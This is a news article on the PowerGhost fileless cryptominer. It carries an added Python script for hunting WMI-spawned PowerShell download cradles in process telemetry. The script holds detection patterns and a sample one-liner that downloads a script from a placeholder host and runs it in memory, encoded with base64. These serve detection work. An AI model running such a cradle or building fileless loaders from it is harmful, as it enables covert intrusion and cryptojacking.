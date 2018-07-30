A new strain of malware has come to light that is bad news for corporations. It is capable of stealthily establishing itself on a system and spreading across large corporate networks, infecting both workstations and servers.

The malware, named PowerGhost by Kaspersky Lab, which unearthed it, uses fileless techniques to plant an illicit cryptocurrency miner on the victim's system.

“The malicious program uses lots of file-less techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the Lab said.

The malware's script works in several steps. First, PowerGhost checks whether a new version is available; if so, it downloads the new version and launches it in place of itself. Second, the malware begins propagating across the network, infecting as many devices as possible.

In the following steps, the malware attempts to escalate its privileges and establishes a foothold on the system using various manoeuvres.
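The two traits described above, remote infection through WMI and a one-line PowerShell command that downloads the miner and launches it without touching the disk, are exactly what a defender would hunt for in process-creation telemetry. The following Python script is an added example, not Kaspersky Lab's code and not derived from PowerGhost samples: it scores constructed process-creation records, modelled on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), for a PowerShell process spawned by the WMI provider host and for a download-and-execute cradle, including one hidden behind -EncodedCommand. The hostname, process IDs and the one-liner itself are made-up placeholders.

```python
"""Hunting heuristics for the fileless infection pattern described in the article.

Added example: not Kaspersky Lab code and not derived from PowerGhost samples.
Scores constructed Windows process-creation records (modelled on Sysmon
Event ID 1 fields) for two traits the article describes:
  1. PowerShell launched remotely through WMI (parent is WmiPrvSE.exe)
  2. a one-liner that downloads code and runs it in memory without a file
The one-liner, hostname and process IDs below are made up for illustration.
"""
from __future__ import annotations

import base64
import re

# Common download cradles: a match means code is being fetched over the network
DOWNLOAD_RE = re.compile(
    r"DownloadString\s*\(|DownloadData\s*\(|Net\.WebClient|Invoke-WebRequest|"
    r"Invoke-RestMethod|\biwr\b|\birm\b|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# Ways to hand fetched text straight to the interpreter instead of a file
EXEC_RE = re.compile(
    r"Invoke-Expression|\biex\b|\[Reflection\.Assembly\]::Load|\.Invoke\s*\(",
    re.IGNORECASE,
)
# Flags that suppress profiles, windows and execution policy: routine in droppers
STEALTH_RE = re.compile(
    r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|"
    r"-exec(?:utionpolicy)?\s+bypass",
    re.IGNORECASE,
)
# -EncodedCommand / -enc / -e followed by base64 of a UTF-16LE script
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_command_line(cmdline: str) -> str:
    """Return the command line plus any decoded -EncodedCommand payload."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline}\n{decoded}"


def is_download_cradle(script: str) -> bool:
    """True when the text both fetches code and executes it without a file write."""
    return bool(DOWNLOAD_RE.search(script)) and bool(EXEC_RE.search(script))


def score_event(event: dict) -> list[str]:
    """Return human-readable reasons an event looks like fileless remote infection."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    text = decode_command_line(event.get("CommandLine", ""))
    reasons: list[str] = []
    if image.endswith(("powershell.exe", "pwsh.exe")):
        if parent.endswith("wmiprvse.exe"):
            reasons.append("PowerShell spawned by WMI provider host (remote WMI execution)")
        if STEALTH_RE.search(text):
            reasons.append("stealth flags (-nop / -w hidden / -ep bypass)")
        if ENCODED_RE.search(text):
            reasons.append("base64 -EncodedCommand payload")
        if is_download_cradle(text):
            reasons.append("download-and-execute cradle, nothing written to disk")
    return reasons


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> reasons for every event with at least one indicator."""
    return {e["ProcessId"]: r for e in events if (r := score_event(e))}


# Constructed sample input (not real telemetry). The one-liner mirrors the
# download-then-launch-in-memory behaviour the article describes; the host is fake.
ONE_LINER = "IEX (New-Object Net.WebClient).DownloadString('http://updater.example.invalid/payload.ps1')"
ENCODED = base64.b64encode(ONE_LINER.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {   # benign: an admin lists a directory from an interactive shell
        "ProcessId": 4201,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Logs",
    },
    {   # suspicious: WMI-spawned, hidden window, encoded download cradle
        "ProcessId": 4202,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
    },
    {   # unrelated process; ignored by the PowerShell-specific checks
        "ProcessId": 4203,
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Decoding the -EncodedCommand payload before matching is the step that matters most: the cradle is invisible in the raw command line, and only the decoded UTF-16LE script exposes the download and execute calls. Each indicator on its own is noisy (administrators also run PowerShell through WMI and use -EncodedCommand), so treat the hits as a combined score to triage rather than a verdict.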

The Lab also found a more troubling implication of the attack. “In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services,” the Lab said.

Geography of infections by the miner. Source: Kaspersky Lab

The developing world was the biggest target of the malware, with India, Brazil, Colombia and Turkey encountering the most infections. In India, up to 290 users were affected.